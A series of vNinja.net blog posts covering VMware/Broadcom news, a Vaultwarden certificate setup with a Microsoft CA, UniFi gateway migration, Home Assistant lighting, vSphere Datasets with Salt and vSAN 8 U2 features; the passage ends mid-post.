Where Did My VMware Security Advisories Go? They Went Here! URL: https://vNinja.net/2024/05/13/where-did-my-vmware-security-advisories-go-here/ Date: 2024-05-13 Author: christian Tags: VMware, Broadcom, Security VMware by Broadcom recently published a blog post called Where did my VMware Security Advisories go? outlining the location changes for the VMware Security Advisories (VMSAs), making clear that from May 6th 2024, they are moved to the Broadcom Support Portal. While this was anticipated as part of the content transition following the acquisition, it was not anticipated that the VMSAs would be moved into a walled garden that required a login. While it was free to create an account, and get access to the advisories, this was a move that caused some uproar and controversy. Thankfully VMware by Broadcom has reconsidered the login requirement, and the advisories are again easiliy accessible for everyone. Links below! VMware by Broadcom VMSA Links # Product Line Link VMware Cloud Foundation Security Advisories - VMware Cloud Foundation Tanzu Security Advisories - Tanzu Application Networking and Security Security Advisories - Application Networking and Security Software Defined Edge Security Advisories - Software Defined Edge Also, note that VMSAs for EUC products will continue to be published on www.vmware.com/security/advisories and are not moved as part of this change. --- # VMware by Broadcom Promises Free Security Updates for vSphere URL: https://vNinja.net/2024/04/16/vmware-by-broadcom-promises-security-updates/ Date: 2024-04-16 Author: christian Tags: VMware, vSphere, ESXi, vCenter In a new blog post by Broadcom CEO Hock Tan VMware by Broadcom promises that they will continue to provide security updates for VMware vSphere and other products for all customers who are running the old perpetual licenses, even if those customers don’t transition to the new subscription based license model. To ensure that customers whose maintenance and support contracts have expired and choose to not continue on one of our subscription offerings are able to use perpetual licenses in a safe and secure fashion, we are announcing free access to zero-day security patches for supported versions of vSphere, and we’ll add other VMware products over time. At the moment, this means that the following products will get security updates, regardless of valid support status, based on the Product Lifecycle Matrix Product Name End of General Support vCenter and ESXi 7 02. April 2025 vCenter and ESXi 8 11. November 2027 vSphere 6.7 reached end of support in October 2022 and is no longer supported, nor are any previous versions. Update 18th April 2024: VMware by Broadcom has also published Zero Day (i.e., Critical) Security Patches for vSphere (7.x and 8.x) Perpetual License Customers with Expired Support Contracts (97805) which confirms that vSphere 7 and 8 are the versions supported, and that existing patch mechanisms will continue to work. This is a very welcome clarification by Broadcom, as the new licensing scheme and pricing is still a hot discussion topic and hopefully this list will be expanded in the time to come! --- # Vaultwarden+Caddy and Microsoft CA URL: https://vNinja.net/2024/03/06/vaultwarden-caddy-and-microsoft-ca/ Date: 2024-03-06 Author: christian Tags: Vaultwarden, Caddy, Microsoft CA, PKI, TLS In my work lab environment, we have a need to share passwords and other login credentials among the team who uses it. Recently we decided to try out using Vaultwarden for this purpose. Linuxiac.com has a great guide on setting up Vaultwarden with Caddy, with Docker Compose, but this particular setup relies on Let’s Encrypt SSL certificates. Let’s Encrypt is great, but requires some online presence, which we don’t want for this environment. In addition that we have an internal Microsoft CA based PKI infrastructure that we wanted to use for this purpose. The setup follows the guide mentioned above, with some tweaks to utilize the internal PKI infrastructure. This includes the use of Caddy as a reverse proxy. Specifically, it uses caddy-docker-proxy which allows for Caddy configuration via labels in the Docker configuration. Generating Certificates for Vaultwarden from a Microsoft CA # First off, we need to create a Certificate Signing Request (CSR) for the Vaultwarden service. This CSR then needs to be processed on the Microsoft CA in order for it to create a certificate that we can use in Caddy. The following steps were performed on the Linux VM (Photon OS) hosting the Vaultwarden+Caddy Docker configuration: Creating a private key # We need a private key to sign the Certificate Signing Request (CSR) with. This can easily be created with the following command: openssl genrsa -out vaultwarden.key 2048 This generates a key file without any password protection, and is not recommended for production use. Check the OpenSSL documentation for recommended practices. Generating a Certificate Signing Request (CSR) with Subject Alternative Name (SAN) # In order for modern browsers to accept the certificate it gets presented, the Subject Alternative Name (SAN) needs to be supplied. For OpenSSL to be able to create a CSR which contains that information, an OpenSSL .cnf file needs to be provided. I called mine vaultwarden.cnf and placed it in my current working directory. [req] distinguished_name = req_distinguished_name req_extensions = req_ext prompt = no [req_distinguished_name] C = NO ST = Vestland L = Bergen O = Lab OU = Lab CN = vaultwarden.<mydomain> [req_ext] subjectAltName = @alt_names [alt_names] IP.1 = 172.16.4.15 DNS.1 = vaultwarden.<mydomain> DNS.2 = vaultwarden The values in this file needs to be updated to reflect the environment it is being deployed in. The SAN is defined under [alt_names], and I included both the IP address, the FQDN and the hostname to cover all my bases. These names coincide with the name defined in our internal DNS, as well as the values used in the docker-compose.yaml file that comes from the How to Install Vaultwarden Password Manager with Docker guide. Generating the CSR is then done by running the following command, utilizing the .key and .cnf file created earlier. openssl req -new -key vaultwarden.key -out vaultwarden.csr -config vaultwarden.cnf The result is a new file, called vaultwarden.csr that needs to be submitted to the Microsoft CA to generate the certificate. Submitting the CSR to the Microsoft CA with certreq # Copy the generated vaultwarden.csr file to your Microsoft CA. From there use certreq to submit it to the CA. I have a Certificate Template called WebServer2Y that was used to generate the certificate. The command used was (replace ca-name\Issuing CA01 with correct values for your environment) certreq -submit -config "ca-name\Issuing CA01" -attrib "CertificateTemplate:WebServer2Y" .\vaultwarden.csr .\vaultwarden.cer` This generates the vaultwarden.cer certificate in the current working directory. Configuring Caddy to use the new certificate, in docker-compose.yaml # In order for Caddy to use the new certificate (vaultwarden.cer) and key (vaultwarden.key) the files needs to be copied to the correct location based on the docker-compose.yaml setup. By default /data/caddy/ in this setup maps to /var/lib/docker/volumes/vaultwarden_caddy_data/_data/caddy/ on the physical filesystem, so I created the /var/lib/docker/volumes/vaultwarden_caddy_data/_data/caddy/tls/ folder and copied the vaultwarden.cer and vaultwarden.key files to that location. Edit docker-compose.yaml and add caddy.tls under labels, with a relative path to the vaultwarden.cer and vaultwarden.key files: labels: ... caddy.tls: /data/caddy/tls/vaultwarden.cer /data/caddy/tls/vaultwarden.key Configuring caddy.tls to use the local certificate and key, turns off the Caddy default of connecting to Let’s Encrypt and trying to get a public certificate. Once that whole task was complete, starting Caddy and Vaultwarden with docker-compose up -d works as intended, and the Vaultwarden interface is available with an internally signed and valid certificate. root@vaultwarden [ ~/vaultwarden ]# docker-compose up -d [+] Running 2/2 ✔ Container reverse-proxy Started ✔ Container vaultwarden Started --- # Migrating from Unifi USG to UXG-Lite URL: https://vNinja.net/2024/02/19/migrating-from-usg-to-uxg-lite/ Date: 2024-02-19 Author: christian Tags: networking, ubiquiti, UXG-Lite, USG, UniFi It was finally time to replace my old UniFi Security Gateway (USG) 3P with it’s shiny new brother, the Gateway Lite (UXG-Lite). The USG 3P has served me well over the last 5 or so years, but as the new UXG-Lite promises better throughput especially when enabling IDS/IPS it was time to replace it. In addition to the routing performance improvements, the UXG-Lite also offers WireGuard VPN support out of the box, which will allow me to get rid of my old L2TP VPN setup. I am sure there are other new features available, that I have not investigated yet. Here’s how I migrated my entire home network from the USG-3P to the new UXP-Lite, with nothing more than a couple of minutes downtime in total. I utilize Hostfi for my Unifi controller needs, if you use a local Cloud Key the procedure might differ. USG to UXG-Lite Migration Procedure using a Temporary Site on Hostifi # Create a new temporary Site on Hostifi Connect UXG-Lite besides my existing USG-3P, on the WAN port. Luckily I have a fiber connection with more than one IP, so I could connect it besides the existing gateway. Connect the LAN port on the UXG-Lite directly to an ethernet adapter on a laptop or desktop computer Verify that a 192.168.1.x IP is assigned ethernet adapter Open https://192.168.1.1 Select “Manually Connect to UniFi Network” Enter Hostifi FQDN, and credentials Select the Temporary site to assign UXG-Lite to Log into Hostifi and update UXG-Lite (if required). Mine was on 3.1.15, newest available was 3.1.6.12746 Once that was done, I went back to my original site and removed the UGP-3P from my site, while still connected to my USX-Lite. I then disconnected the UGP-3P from my network, both WAN and LAN cables. The next step was going back to my temporary site, and moving the UXG-Lite to my original site. After a minute or two of downtime, I was back online with my laptop, and the UXG-Lite was now the main gateway in my original site. The last step was connecting my LAN ethernet cable to my switch, and disconnect it from my laptop. Once these steps were completed, the new UXG-Lite was online and enrolled into my Unifi site. All my previous configuration was retained as they were, and my UniFi network was up and running again within minutes. All in all, a very seamless and straight forward procedure with minimal downtime. --- # Let's Talk Data by Proact URL: https://vNinja.net/2024/01/26/lets-talk-data-proact/ Date: 2024-01-26 Author: christian Tags: Podcast My employer, Proact, has a podcast called Let’s Talk Data and I have recently joined as permanent member of the panel after I’ve been a guest a couple of times before. Along with my colleagues Tony Gent and Christian Lehrer we dive into various IT-topics. This is a general IT podcast, as the tagline suggests; The Podcast for IT-professionals – by IT-professionals For the first time since vSoup, I’ll be a regular podcaster again — and this time, it includes video! Here it is, the YouTube version of the first episode I’m a part of. Technology trends of 2024 – Rethinking Cyber Resiliency # It is also available on Spotify and Apple Podcast. More to come in the coming weeks and months! --- # Removing vCLS Machines in vSphere 7.0.3 URL: https://vNinja.net/2023/12/30/removing-vcls-machines/ Date: 2023-12-30 Author: stine Tags: ESXi, VMware, vSphere, vCenter I was recently contacted by a customer that needed help with some vCLS VMs that somehow had gotten moved to a datastore and now resided on servers that they weren’t registered on. I tried to remove them with this very good post written by Duncan Epping, but I realized it would never work considering that the services don’t expect the vCLS to have moved and consider them as missing. This is how I solved the problem: I put the host with the vCLS machines in maintenance mode. Went to the UI of the host. Selected the VMs and unregistered them. Unregistered the host from vCenter and registered the host again. --- # Fun and Games With WLED, ESP32, IKEA UPPLYST and Home Assistant URL: https://vNinja.net/2023/12/17/fun-and-games-with-wled-esp32-ikea-upplyst-and-homeassistant/ Date: 2023-12-17 Author: christian Tags: Home Assistant, Home Automation IKEA has a fun little LED lamp called UPPLYST which is shaped like a cloud — Which in my line of work is symbolic in more ways than one. I’ve been using this lamp in the background of my video meetings from the home office for quite some time, but recently decided to have some more fun with it. I’ve had it connected to a smart outlet that I can turn off/on via Home Assistant, which I’ve in turn created a webhook to toggle on/off which I then call from my Elgato Stream Deck for easy accesibility. Removing the existing LED light inside of the UPPLYST lamp is a simple operation, as the LED is fixed to a back-plate that pops out via three simple plastic clips. The same goes for the LED fixture, it’s easily removeable as well, once the back-plate has been removed. Once that was done, I added a ESP32-DevKitC that I had flashed with WLED, which is connected to a 5V Pixel Ring Round LED Circle with 12 addressable LEDs. Since the ESP32 supplies 5V directly to the Pixel Ring, there is no need for an external power supply. WLED makes it really easy to configure the ESP32 and get it configured on my home IoT Network. It is also detected automatically in Home Assistant, and controllable from there immediately after adding it. My “final” setup is pretty simple, I fixed the LED Pixel Ring to the IKEA back-plate using Tack-It and the ESP32 itself is just attached using some velcro! I then re-assembled the light fixture, and hung it back on the peg-board where it belongs. Part list # IKEA LED UPPLYST ESP32-DevKitC 5V Pixel Ring Round LED Circle Dupont Cables Tack-It Velcro USB Power for the ESP32-DevKitC This is what the final result looks like, effects called via web hooks in Home Assistant from my Stream Deck — And yes, I know I can see the red light from the onboard LED on the ESP32. I should have mounted it the other way around. Of course, this can be automated in other ways as well, this is just an example of how it can be called from a third party. WLED Effects and Home Assistant # Lightning # The lightning effect in the video, for instance, has the following automation code in Home Assistant: alias: Cloud Lightning description: "" trigger: - platform: webhook allowed_methods: - POST - PUT local_only: true webhook_id: storm condition: [] action: - service: light.turn_on target: entity_id: [] device_id: - f2253fe283ebeeb725aac76887945f22 area_id: [] data: effect: Lightning rgb_color: - 255 - 255 - 255 mode: single Red color effect # The red color effect in the video, for instance, has the following automation code in Home Assistant: alias: Cloud Red description: "" trigger: - platform: webhook allowed_methods: - POST - PUT local_only: true webhook_id: cloud-red condition: [] action: - service: light.turn_on target: entity_id: [] device_id: - f2253fe283ebeeb725aac76887945f22 area_id: [] data: rgb_color: - 255 - 0 - 0 effect: Solid mode: single --- # Down the Rabbit Hole With VMware Aria Automation Config @ Explore 2023 [VMTN2239BCN] URL: https://vNinja.net/2023/11/08/down-the-rabbit-hole-with-vmware-aria-automation-config-explore-2023/ Date: 2023-11-08 Author: christian Tags: VMware, Explore At VMware Explore 2023 Barcelona I was lucky enough to be able to present my Down the Rabbit Hole With VMware Aria Automation Config session, and the good people behind vBrownbag has made a recording of it available on YouTube! This is a shortened version of the talk I also did at TechX 300 in Copenhagen in September. All the code for the demos is available in my Down-The-Rabbit-Hole/AriaAutomationConfig GitHub repository. --- # VMware Explore 2023 Barcelona Partner Leadership Forum URL: https://vNinja.net/2023/11/03/vmware-explore-2023-barcelona-partner-leadership-forum/ Date: 2023-11-03 Author: christian Tags: VMware, Explore Alex Matthews opening the Partner Technical Leadership Forum My VMware Explore 2023 Barcelona week kicked off with a Partner Technical Leadership Forum at the Fira. The first session was VMware Generative AI Strategy with Robbie Jerrom, Principal Solutions Engineer, who provided a great overview of what VMware is doing in the AI space, and how VMware Private AI can help enterprises manage AI in an properly architected manner, in their own environments. Martin Hosken presenting Next up was Martin Hosken, Chief Technologist Cloud EMEA with a session on Multi-Cloud, and beyond, looking at current trends, especially the trend of repatriation from the hyperscalers. Theresa Thompson presenting Theresa Thompson, Staff Technical Marketing Architect had a very good session on VCF Holodeck, going through what it is, how it should be used and what scenarios and use cases it covers. The last session was a partner specific panel with Scott Berquist, Senior Director Ecosystem Solutions and Alex Matthews, Senior Director, Solution Engineering, Partners & Digital, with a Q&A section at the end. Alex Matthews and Scott Berquist The entire session was under NDA, so I can’t get into specifics, but it was time very well spent. Kudos to the team behind it, like Linda Smith, who I know had to reshuffle the entire agenda due to external factors. --- # Updating Shodan Monitor Assets via REST API and Curl URL: https://vNinja.net/2023/11/01/updating-shodan-monitor-assets-via-rest-api-and-curl/ Date: 2023-11-01 Author: christian Tags: Shodan, Monitoring, bash Shodan Monitor is a service by shodan.io that allows for monitoring of IPs, networks or domains, based on your own definitions. In my case, I use it to monitor my home network public IP, and to alert me if there is anything strange going on, like new services or any other abnormalities. Shodan Monitor Trigger Definitions This is very useful, I get alerts both via a Slack Webhook and email, but as most residential connections I have a dynamic IP address from my ISP. It doesn’t change often, but it happens. My Shodan Monitor definition is based on an IP assignment, and all of a sudden I got notifications for things that were not present in my network. My public IP had changed, and I was now receiving alerts for someone elses network who had been assigned my old public IP. Suboptimal. One way of solving this is setting up the monitoring to monitor a Dynamic DNS entry that gets automatically updated whenever my public IP changes. Simple enough to set up, but not nearly as fun as the solution I ended up with. Description # In the end I created a small bash script that runs as a scheduled cron job on a VM in my environment. In short, the script checks my public IP through the Shodan CLI and compares it with the IP address stored in a file called shodanip.txt (The file gets created if it does not already exist). Other methods of obtaining the current public IP can be used as well, but the script utilizes the shodan myip command to fetch it. If the IPs match, it quits, but in all other cases it updates the shodanip.txt file with the new IP address, and then uses the Shodan REST API to update the Monitor Asset to the new value (via curl). The script requires that you have your own Shodan API Key and that you know the Shodan Alert ID for the Monitor Asset you want to edit. To find the Shodan Alert ID either look at the URL when you edit an asset in Shodan Monitor, it’s the value shown right after monitor.shodan.io/networks/edit/ in the browser. Alternatively use shodan alert list command via the Shodan CLI to get the Alert ID. These values, and the location of the shodanip.txt is defined in lines 8 - 11 in the script, under the heading #Variables The Script # Hopefully this is useful for someone else as well, at least this should save me from getting wrong alerts from Shodan whenever someone gets assigned my old public IP from my ISP. I should probably update my Dynamic DNS Update script as well. --- # vSphere Distributed Switch Configuration on Some Hosts Differed From That of the vCenter Server URL: https://vNinja.net/2023/11/01/vsphere-distributed-switch-configuration-on-some-hosts-differed-from-that-of-the-vcenter-server/ Date: 2023-11-01 Author: stine Tags: ESXi, VMware, vSphere, vCenter I recently came across this message: The vSphere Distributed Switch configuration on some hosts differed from that of the vCenter Server when I was going to upgrade some vDS switches. There were several complicated solutions presented to me via Google, but this is how I eventually managed to fix it easily. Find what ports that are listed in the error and navigate to the Port section of the vDS: Select the port that has the issue and press the Statistic section: Select the Auto-refresh button and wait a couple of minutes and the message should clear itself. Remember to turn this setting off after the problem is sorted. --- # Tips for VMware Explore Barcelona 2023 URL: https://vNinja.net/2023/10/18/tips-vmware-explore-barcelona-2023/ Date: 2023-10-18 Author: stine Tags: VMware Explore Barcelona 2023 is upon us and if you are travelling for the first time or just looking for some general tips about the conference, look no further. I previously wrote about my experience traveling to VMware Explore last year. It was my first trip to VMware Explore, which was also my first big convention. My tips will be a characterized by Explore being downsized last year before a lot of last minute registrations, so everything was very crowded. Which leads me to my first tip: Sessions # Go to the content catalog and book the sessions you want to attend. The sessions tend to be filled up quite quickly so if you don’t get a spot, add the session as a favorite and show up before it starts. Sometimes people overbook and then don’t show up for all the sessions they book. It’s also important to not overbook yourself. Remember that you need time to move from one session to another and need time to eat, have a break etc. I recommend the sessions held by my friend and colleague Christian Mohn: VMware Community Panel: Level Up Your Career Through Community Participation [VIB2311BCN] Down the Rabbit Hole with VMware Aria Automation Config (SaltStack) [VMTN2239BCN] And the session held by my friend Rudi Martinsen: GitOps for Your Scheduled Tasks [VMTN2221BCN] They are both extremely technically skilled and they hold very good presentations. The Venue # Bring comfortable shoes. You’ll be walking back and forth at the venue for days. You’ll end up standing around and talking to a lot of people, so I’d recommend some good trainers. Bring a good backpack for your laptop, chargers and whatever else you’ll need to spend hours away from the hotel. If you’re like me and love some good merch, you’ll also need space for that. Social Events # There are a lot of social events you can attend at night. Remember to not overbook yourself to avoid becoming so tired you need to skip some of the sessions you’ve been wanting to attend. Lastly, I just want to say get everywhere you really want to attend early and remember to have fun! --- # VMware Explore 2023 Barcelona: My Sessions URL: https://vNinja.net/2023/09/26/vmware-explore-2023-barcelona-my-sessions/ Date: 2023-09-26 Author: christian Tags: VMware, Explore, Talk VMware Explore Barcelona 2023 is fast approaching, the 6th to 9th of November is only a little over a month away. The content catalog is now open for scheduling, and I’m lucky enough to have two sessions lined up this year. First I’ll be doing a Breakout Session Tuesday, Nov 7 11:45 AM - 12:30 PM CET: VMware Community Panel: Level Up Your Career Through Community Participation [VIB2311BCN] This should be a good one, joining Corey Romero, Senior Community Manager VMware, Andrew Nash Principle Systems Engineer, Motorola, Brian Graf Director, VMware{code} Community VMware and Tim Burkard, Staff Technical Learning Enginee VMware for a panel discussion. Later on the same day, I’ll also be presenting a VMTN Tech Talk at 16:00 PM - 16:25 PM CET: Down the Rabbit Hole with VMware Aria Automation Config (SaltStack) [VMTN2239BCN] If any of these are of interest, go ahead and add them to your schedule now. Seats are filling up fast, at least they did last year! Looks like I’ll have a very busy Tuesday, and I hope to see you there! --- # Using vSphere Datasets in Salt URL: https://vNinja.net/2023/09/25/vsphere-datasets-in-salt/ Date: 2023-09-25 Author: christian Tags: vSphere, vCenter, vSphere Datasets, Salt vSphere 8 introduced the new vSphere Datasets feature. In short, Datasets provides a way to exchange information (metadata) between vCenter and a VM, read/writeable through VMware Tools, which is a pretty powerful option. vSphere Datasets architecture diagram William Lam has written a great introduction to the concept vSphere Datasets - New Virtual Machine Metadata Service in vSphere 8, see that for details, including some great code examples on how to create and use DataSets. The official documentation is a good resource: What are vSphere DataSets? I thought this might be a nice way to pass information from vCenter, or a VM, to Salt in order to use this metadata information on a Salt minion. Thankfully, this was fairly easy to accomplish. 1. Create a Dataset via PowerShell # First we need a Dataset to store metadate in. By creating a Dataset called salt-ds, I created a location to store data that I want to access from the Salt minion in a VM. This dataset is writeable by vCenter (HostAccess) and readable (GuestAccess) from the VM. Replace the value for vm-id in $vm_moref with a valid ID for a VM. Powershell Code # $vm_moref = "vm-id" $adminDataSetParam = @{ Name = "salt-ds"; Description = "Dataset for Salt"; VMMoref = $vm_moref; GuestAccess = "READ_ONLY"; HostAccess = "READ_WRITE"; OmitFromSnapshotClone = $false; } New-VMDataset @adminDataSetParam Set AppID value for salt-ds DataSet # This creates a Dataset entry called AppID which has the value of pihole, for a given VM. In this example, I use pihole as the value, as I have automated installation of Pi-Hole through Salt already. Powershell Code # $sharedDataSetEntry1Param = @{ Name = "AppID"; VMMoref = "vm-id"; Dataset = "salt-ds"; Value = "pihole"; } New-VMDatasetEntry @sharedDataSetEntry1Param Reading and formatting DataSet entries from VMware Tools # Once the DataSet is created, and populated with data, this can be accessed and read through VMware Tools inside the VM (example is for a Linux VM). Bash commands # sudo vmtoolsd --cmd 'datasets-get-entry {"keys": ["AppID"], "dataset":"salt-ds"}' { "result": true, "entries": [ { "AppID" : "pihole" }] } This returns the json output from VMware Tools, but in order to use this data in an easy way, I piped it through jq, extracting only the entries for .AppID, in the salt-ds dataset:¨ sudo vmtoolsd --cmd 'datasets-get-entry {"keys": ["AppID"], "dataset":"salt-ds"}' | jq -r '.entries[].AppID' pihole This command only returns the value for the AppID entry, and nothing else, perfect for picking it up somewhere else. Tying it together with Salt # In order to use this from Salt, I created a state file, that copies my script from the Salt master to the minion. It then executes the script locally, and sets a grain based on the output, and deletes the script when done. This means that the value in AppID, returned from VMware Tools, gets set as a targetable object in Salt, making it possible to do futher actions based on the grain itself, like automatically installing Pi-Hole based on the grain being present and set with a given value. vSphere Datasets state file (init.sls) # copy-script: file.managed: - name: /tmp/script.sh - source: salt://{{ slspath }}/script.sh roles: {% set AppID = salt['cmd.run']('/bin/sh -c "/tmp/script.sh"') %} grains.present: - value: {{ AppID }} delete-script: file.absent: - name: /tmp/script.sh These files, along with other Salt state files etc., can be found in my GitHub repository. The state file, and script, for utilizing vSphere Datasets is found here. This is just an example on how vSphere Datasets can be used in conjuntion with other products, like Salt (or Aria Automation Config). By utilizing vSphere Datasets to exchange data between the vCenter and the VM, this can be accomplished without having to provide credentials any of the solutions used. The vCenter administrator does not need to have permissions to login to the VM to be able to set the metadata, and the VM administrator does not require vCenter credentials to be able to read it. vSphere Datasets also follow cloned VMs, so this can also be utilized on templates as well. --- # Tech X 300 2023: Wrapped URL: https://vNinja.net/2023/09/23/techx-300-2023-wrapped/ Date: 2023-09-23 Author: christian Tags: Speaking, TechX300, VMUG VMUG Denmark put on the (northern European?) VMUG event of the year on the 20th and 21st of September; Tech X 300. It was held at the beautiful Nordisk Film Biografer Palads cinema in Copenhagen, which offers great rooms for the presentations, along with huge screens. I think the largest one was over 12 meters wide! Room A was a large theater! All in all, it was a great event with a number of excellent speakers. I was fortunate enough to included, and did my Down the Rabbit Hole with VMware Aria Automation Config (SaltStack) talk (Apologies to the speakers behind me on the schedule, as I ran over my time slot quite a bit. I need to work on that before VMware Explore). The whole event was very well organized, and the content was really great. I especially enjoyed the opening keynote by Richard Garsthagen, who walked us through most of the history of the extended VMware community, from it’s beginnings until now. Combine that with an interactive Kahoot! and you’ve got yourself a winner. Well done Richard! Of course, the technical content was top notch, as expected when looking at the speaker list, but I have to say I really enjoyed the non-technical talks as well. Both days of the event ended with a closing keynote, of a decidedly non-techical nature. Day one was “I’m OK, You’re OK, We’re OK: Living With AD(H)D In Infosec” by Klaus Agnoletti. This was a very personal, but also eye opening, talk about how Klaus deals with his ADHD. Day two ended with a fantastic non-slide talk by Thor Pedersen, about the “Once Upon a Saga”-project, his 10-Year Journey Visiting All 203 Countries in the World Without Flying. An absolutely inspiring and heartwarming tale of an impossible project. This content was fantastic. It is great idea to invite to a technical two day event, and end each day with something completely different. We all need other perspectives and other things to contemplate. Thank you VMUG DK for giving us that opportunity, I know this was greatly appreciated by many of the attendees! To the Danish VMUG crew: Yet again you pulled it off! You are truly an inspiration, and you do set a high bar for the rest of us. I hope I get the chance to both attend, and present, at future events you put on. To attendees and speakers: Thank you for showing up and contributing. I really enjoyed the interactions we had during these couple of days, and in my mind this shows that we still need physical events. While remote and video meetings/events work, they just are not the same. --- # VMware vSAN 8 U2 Announced at Explore 2023 URL: https://vNinja.net/2023/08/22/vmware-vsan8u2/ Date: 2023-08-22 Author: christian Tags: vSphere, vSAN, VMware, ESXi At VMware Explore US 2023 in Las Vegas, VMware announces vSAN 8 U2!. At the time of writing, no set General Availability date has been published, but look for it being available some time this fall. Some details may also change before the product hits the market. vSAN 8 U2 — What’s new # Nothing really big and revolutionary in the core vSAN 8 U2 announcement, besides vSAN Max that is. It is nice to see that native file services in vSAN ESA are now in feature parity with vSAN OSA, and that the configuration of 2-Node and Stretched Clusters as been simplified. Other than that, everything else seems to be performance improvements, simplified management and scalability improvements but no stand-out new features in the core offering itself. Here’s a quick rundown of the improvements in vSAN 8 U2 # vSAN ESA now supports native file services # Supports NFS and SMB protocols for traditional and cloud native clients Feature parity with vSAN file services in Original Storage Architecture Adaptive Write Path Optimizations in vSAN ESA # Use of more in-memory I/O banks to process incoming writes more quickly Dynamic and scalable based on the demands of the workloads Improves aggregate and single object (VMDK) performance in vSAN ESA Higher IOPS Higher throughput — Lower latency Improved Performance for Disaggregated Environments # Dynamically uses optimal write path for guest VM writes Default write path Large I/O write path Includes other optimizations made to Adaptive Write Path in vSAN 8 U2 Better performance in disaggregated environments Up to 200% higher write throughput Upto 70% reduction in latency Higher Throughput and IOPs for I/O Intensive Workloads # Improved parallelism with vSAN ESA’s object manager client Delivers higher IOPS and throughput for single object, I/O intensive workloads Compliments I/O processing improvements in vSAN 8 U1 Reduces potential bottleneck conditions high in the storage stack Most beneficial for: Mission critical applications, databases, etc. Resource intensive VMs Single object (VMDK) performance evaluations Support for up to 500 VMs per host in clusters running vSAN ESA # 2.5x the density of earlier versions Allows for new high-density cluster designs Exploit benefits of vSAN ESA Capacity efficiencies using erasure coding Minimal resource overhead High performance New ReadyNode profile and support for Read-Intensive devices for vSAN ESA # New ReadyNode profile ideal for small data centers and edge environments Dramatically lower TCO while benefiting from capabilities in ESA New snapshots Smaller failure domains Improved efficiency New support for Read- Intensive NVMe devices Available in some ReadyNode profiles Supported on vSAN 8 U1 and later Auto-Policy Management improvements in vSAN ESA # Improves Auto-Policy Management feature introduced in vSAN 8 U1 Single click “Update Cluster DS Policy” to remediate change Updates prescribed, cluster- specific storage policy if number of hosts in cluster change Streamlines handling of ongoing changes to cluster reduces manual intervention Capacity overhead reporting improvements in vSAN ESA # Provides “ESA object overhead” in cluster capacity usage breakdown view Represents capacity consumed for vSAN’s log- structured filesystem (LFS) for all object and replica data vSAN ESA Prescriptive Disk Claim # Uses new outcome oriented “desired state” disk claiming model Define disk claim criteria for hosts in cluster, and let vSAN take care of the rest Provides consistency to disk claiming process for initial deployment and cluster expansion Continuous checks of compliance to desired state Available using API and CLI Support for key expiration with Data-at-Rest Encryption in vSAN OSA and ESA # Support of key expiration standard for KMIP-based Key Management Servers Integrated with Skyline Health for vSAN Triggered health finding will provide: Days remaining on valid keys Convenient way to perform a shallow rekey Skyline Health for vSAN remediation enhancements # Health finding recommendations customized to specific versions of vSAN Improved information on risks of not remediating triggered finding More prescriptive options to fix identified issue Default Alternative New endurance monitoring of NVMe devices in vSAN ESA Top Contributors enhancements in vSAN OSA and ESA # Find performance hot spots over a customizable time period when diagnosing performance issues Multiple source types available for analysis VMs Hosts(frontend) Hosts(backend) Host disks Transpose other top contributors in same performance view to understand correlations I/O Trip Analyzer for 2-Node and Stretched Clusters in vSAN OSA and ESA # Capture diagnostics data on workloads running in a vSAN stretched cluster or 2-node cluster Easily identify primary source of latency Outstanding I/Os of object Network link across sites Network links within sites Host storage devices Supports all data placement schemes RAID-1 RAID-5 RAID-6 Witness Traffic Separation and other configuration improvements in vSAN OSA and ESA # Easily configure Witness Traffic Separation in UI Removes need for CLI commands to properly tag witness traffic Applies to both 2-Node and stretched clusters New support for “medium” sized witness host appliance in vSAN ESA New support in vLCM to manage lifecycle of all witness host appliance types --- # VMware vSAN 8 U2 to the Max URL: https://vNinja.net/2023/08/22/vmware-vsan8u2-to-the-max/ Date: 2023-08-22 Author: christian Tags: vSphere, vSAN, VMware, ESXi At VMware Explore US 2023 in Las Vegas, VMware announces vSAN 8 U2 with the new vSAN Max™ architecture!. At the time of writing, no set General Availability date has been published, but look for it being available some time this fall. Some details may also change before the product hits the market. vSAN Max # The clear stand-out new offering in vSAN 8 U2 is the new Disaggregated Storage offering called vSAN Max™. Broken down to its core, this is vSAN HCI Mesh on steroids, with some new and very shiny sprinkles on top. vSAN Max™, with its new license model, is a dedicated storage cluster, built on vSAN ESA. A vSAN Max™ cluster only provides storage resources, and does not run traditional VM workloads. This storage cluster can be consumed by other vSphere clusters, either as a primary storage option or in addition to the storage those cluster already consume from other sources. This allows for the disagregation between compute and storage resources, while at the same time offering the benefits of integrated management. vSAN Max™ also supports stretched clusters, for a true enterprise multi-site setup. A single host in can offer up 360 TB of pure NVMe storage, allowing vSAN Max™ to scale into the petabyte territory. vSAN Max™ client clusters can be traditional vSphere clusters or vSAN ESA clusters. These clusters can be managed by same or different vCenter Server than vSAN Max clusters. Storage traffic goes over the vSAN networking stack. Planned Consumption and Deployment Model # vSAN Max™ will be a new offering in the vSAN family Existing vSAN editions will not include vSAN Max™ Licenses contain all necessary entitlements For any vSphere cluster or Cloud Edition Planned with a new per-TiB licensing model Existing vSAN editions will still have a per-core licensing model Minimum per-TiB required to purchase Requires new ESA-based vSAN Max certified ReadyNodes Requires min. of 6 nodes, 150 TiB/node (minimum total vSAN size equals 900 TiB) No support for in-place upgrades from other vSAN editions My Thoughts # This is an interesting move by VMware. Offering a “pure storage solution” is new, but it makes sense as one of the inherent problems with HCI in general is scaling storage independently to the compute. This takes care of that, and at the same time it allows for smaller vSphere clusters to get the performance benefits of larger ones. In environments where smaller clusters are beneficial, like database clusters (for licensing purposes), you’d normally take a performance hit, or go with external dedicated storage. This allows for the best of both worlds, while still allowing you to stay within the licensing boundries, as vSAN Max doesn’t allow you to run VMs on those clusters. That eliminates a pain point in many licensing discussions. Of course, this also depends on how VMware is going to price the licensing for vSAN Max™, which is unknown at this time. At the same time, this proves that VMware really believes in vSAN ESA. It has only been a year since vSAN ESA was announced yet this new edition shows that it can do what VMware anticipated it could, and now want to go head to head competing with external storage vendors. I also wonder if this means we’ll see vSAN Max™ clusters running on non-x86 architectures in the future. Why not run it on ARM CPU’s, and utilize the hight core count for even faster deduplication, compression and encryption? Since vSAN Max™ is licensed on capacity and not sockets/cores, it could quite possible be on a future roadmap. Where does things like DPU’s fit in this picture, can those be utilized to offload processing in the future? I am sure there is more to come here as well, seeing that vSAN ESA seems to allow a more rapid pace of development. --- # VMware vSphere 8 U2 Announced at Explore 2023 URL: https://vNinja.net/2023/08/22/vmware-vsphere8u2/ Date: 2023-08-22 Author: christian Tags: vSphere, VMware, ESXi At VMware Explore US 2023 in Las Vegas, VMware announces vSphere 8 